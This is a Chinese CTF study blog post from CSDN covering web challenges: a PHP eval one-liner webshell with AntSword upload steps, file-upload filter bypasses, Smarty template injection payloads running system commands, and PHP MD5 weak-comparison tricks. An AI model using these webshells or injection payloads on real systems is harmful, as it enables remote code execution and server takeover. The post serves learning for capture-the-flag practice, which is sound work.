CTF做题笔记

最新推荐文章于 2024-07-20 21:28:14 发布
最新推荐文章于 2024-07-20 21:28:14 发布
阅读量668 收藏 19
点赞数 16
分类专栏: CTF 文章标签: 笔记 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74303907/article/details/135644515
版权
本文探讨了Web开发中的安全漏洞,包括PHP中的一句话木马执行、文件上传绕过方法、游戏类环境下的调试与注入,以及JSON对象的使用和MD5加密的绕过技巧,特别是数组绕过的解法。
摘要由CSDN通过智能技术生成

WEB

一.一句话木马:

<?php @eval($_GET['cmd']);?>

上传文件类型题目:

无绕过即可直接上传包含一句话木马php文件,用蚁剑链接。

蚁剑下载链接:https://github.com/AntSwordProject/AntSword-Loader

 文件上传绕过: 1.大小写绕过

                            2.双写绕过

                            3.空格绕过(在后缀名前/后加一空格)

                            4.在后缀名后加‘.’绕过

二.游戏类

在调试器中打开js脚本,寻找重要函数,修改在控制器中。

三.注入

1.smarty注入

   首先发现smarty模板,构造'{}'/'{'上传,如果报错,则smarty模板注入。

   构造data={if system('ls /')}{/if}  *显示数据库目录。

   构造data={if system('cat /目录名')}{/if}

   {if phpinfo()}{/id}

四.json对象

    语法规则:

    使用'{}'表示一个JSON对象,键和值之间使用冒号:分隔

    json['x']=="wllm"   ==>   json={"x":"wllm"}

五.MD5

   1.md5() 函数为 md5加密

   2.一半进行弱比较,md5数组绕过

   3.解法1:可以使用0e开头的数字进行传递参数,因为php将0e开头的数字转化为0,故此时MD5值相等,而两个变量值不相等。

       md5加密后为0e开头的数字的字符串有
byGcY
0e591948146966052067035298880982

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

s1885207154a
0e509367213418206700842008763514

240610708
0e462097431906509019562988736854

314282422
0e990995504821699494520356953734

571579406
0e972379832854295224118025748221

903251147
0e174510503823932942361353209384

 解法2:数组绕过:

 name[]=1,password[]=2

md5不能加密数组,加密数组返回空。

适用于源码中没有判断类型或内容,加上过滤函数则不能使用。

十藏玄苍
关注
  • 16
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF解题笔记(3)
CODING...
01-10 5729
还是一个SQL注入的题目,以下使用SQLMAP爆破的方式以及手工注入的方式来解决这道题目:
CTF做题小结
qq_46148060的博客
10-13 403
1.栅栏密码 1.定义:所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本身有一个潜规则,就是组成栅栏的字母一般不会太多。 2.栅栏密码的加密方式:把文本按照一定的字数分成多个组,取每组第一个字连起来得到密文1,再取每组第二个字连起来得到密文2……最后把密文1、密文2……连成整段密文。 eg:tn c0afsiwal kes,hwit1r g,npt ttessfu}ua u hmqik e {m, n huiouosarwCniibecesnre
CTFHUB-文件上传
m0_64180167的博客
12-25 1280
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php才上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传。
CTF-web题 一句话木马
最新发布
2302_80276789的博客
07-20 158
由php标签为框架,里面的东西七主要作用,@符号是指我们@谁,使不报错,eval是将后面里面的当作php代码执行,$_post[‘a’]为接受psot方法 来接受a这个参数a.可以将a传入system,系统命令等,就可以实现控制作用。链接密码为参数a,进行链接,然后添加。双击进入,此时服务器已经被我们控制。我们便可以查看服务器的文件,我们可以在根目录下找到一个flag文件,点击进去,就可以得到flag。接下来使用中国蚁剑进行连接,打开之后,复制网址,点击右键,添加数据,将url添加进来。
CTFweb题库笔记(难度4)
cocoaiu的博客
08-13 5604
CTFweb题库笔记(41-50)
CTF做题笔记(二)+ 第一次团队内比赛
m0re's blog
04-06 2572
前言: 把之前做过的题总结了下,这篇博客在草稿箱里待了好久了,也该放出来了。 明文 下载好就是这样一个文件: 把它改成压缩包.zip再打开,果然是有东西的 打开提示文本 打开压缩包发现了加密的Word文档 用ARCHPR暴力破解zip密码 密码拿到,hahaha,然后就可以打开那个文档了。 一片空白,,接下来让空白的地方显示出来文字 找到搜索框,搜索选项两个字, 然后找到视图(of...
某RSA
YUK_103的博客
03-02 899
题目如下所示: from Crypto.Util.number import getPrime,bytes_to_long from sympy import Derivative from fractions import Fraction from secret import flag p=getPrime(1024) q=getPrime(1024) e=65537 n=p*q z=Fra...
CTF竞赛实战 中国菜刀与一句话木马
热门推荐
keep coding
05-05 7万+
中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620一.基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%@ P...
CTF做题笔记13
Forever_Han13的博客
05-01 294
CISCN2019 华北赛区 Day1 Web1 Dropbox <!--phar--> <?php class User { public $db; } class File{ public $filename; } class FileList{ private $files; public function __construct($path) { $file = new File(); $file-&gt
CTF做题笔记4
Forever_Han13的博客
12-11 2826
第五题:ics-06 题目:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 解答:启动场景,获得信息 发现只有左侧报表中心可以点击,看见地址中含有id=1,可以尝试用爆破 用crunch工具生成字典 crunch 1 5 0123456789 >> pass_4.txt 查看字典 more pass_1.txt 运用BurpSuite加载字典进行爆破,发现id=2333响应长度不一样 获得flag [外链图片转存失败,源站可能有防盗
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
很简单的CTF笔记
weixin_60972588的博客
11-26 3226
关于CTF 一, 招新题 总结 1.web历险记------学名:不可还原的拼图 简单的源代码问题,按F12即可找到flag 2.C语言的乐园(C语言) 运用C语言在线编译工具 工具地址:http://www.dooccn.com/c/ 3.摩尔斯的秘密 运用在线莫斯工具解决(也可以手动自己查) 工具地址:https://www.xindb.cn/tools/morse2word 二, 编码 总结 1、编码是将明文转换为另一种形式。密码是将明文加密成密文。 2、编码的目的是为了转换格式。密码的目的
CTF web学习笔记
daqiangdetianxia的博客
06-30 1770
web狗生存之道 讲师:y4ngshu 日常渗透测试(笔记) 1.信息收集 2.登陆后台----->getshell 3.Getshell失败----->转换思路------>挖掘其它漏洞(sql注入等)------>列库收集用户信息 4.拿到用户密码------>撞邮箱-------->邮箱拿到关键信息----------->拿到vpn 5.通过vpn去访问文件服务器------->写脚本getshell CTF学习 1.xss打后台-----&gt.
[SWPUCTF 2021 新生赛]caidao(一句话木马+蚁剑)
2401_84499442的博客
07-07 219
第一种方法:直接post传参,首先eval函数是代码执行,那么我们就写入wllm=system('ls /'),查看服务器文件目录。很明显,这里的flag就是我们要找的文件,然后再执行wllm=system('cat /flag'),查看flag文件内容。当然,很明显,这里是一句话木马,那么我们也可以用蚁剑。第一步,因为他已经给出了密码“wllm”,那么我们就直接连接。然后从下往上依次查找文件,最终在/flga中找到flag。
CTF部分题解
qq_72661106的博客
04-19 220
23代表#,后面是上传的文件名。进入网站,发现没有异常,尝试用蚁剑连接。进入网站先打开开发者工具没有发现任何js,尝试用御剑后台扫描目录。打开网站,发现有上传文件功能,尝试使用一句话木马上传php文件。可以看到文件上传路径,之后打开蚁剑进行连接,从而找到flag。打开网站,打开开发者工具在网络选项可以找到登陆密码,发现可以上传文件,尝试用一句话木马上传php文件,点击左侧数据库找到flags,得到flag。得到上传路径,采用zip伪压缩构造url。能够得到admin网址,再点击第一个网址。
CTF 学习笔记
梁辰兴的博客
10-06 4978
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。WordPress是利用PHP开发的博客平台,用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。
CTF初学笔记-web新手题目(附学习资料)
2301_77472496的博客
04-28 878
CTF大赛, 俗话说“兵马未动,粮草先行”,打CTF手里的武器工具少不了。
风二西CTF流量题大集合-刷题笔记|基础题(3)
zerorzeror的博客
01-23 777
Identification 反向16进制flag。后面去github拉flag,略。
ctf garden解题
04-30
CTF Garden是一个在线的CTF(Capture The Flag)平台,提供了各种类型的解题挑战,旨在帮助安全爱好者提升技能和知识。在CTF Garden中,你可以通过解决各种不同难度的题目来学习和实践网络安全相关的技术。 解题过程通常包括以下几个步骤: 1. 题目理解:首先,你需要仔细阅读题目描述,理解题目要求和背景知识。 2. 分析漏洞:根据题目描述,你需要分析可能存在的漏洞或弱点,例如代码注入、文件包含、SQL注入等。 3. 利用漏洞:一旦找到漏洞,你需要尝试利用它来获取目标信息或执行特定操作。这可能涉及到编写代码、构造特定的输入等。 4. 提交答案:当你成功解决题目时,你需要将解题过程中获得的标志(flag)提交给CTF Garden平台进行验证。 在解题过程中,你可能会遇到各种类型的题目,例如密码学、二进制漏洞、网络安全等。每个题目都有不同的解法和技巧,所以解题过程中需要灵活运用各种知识和工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值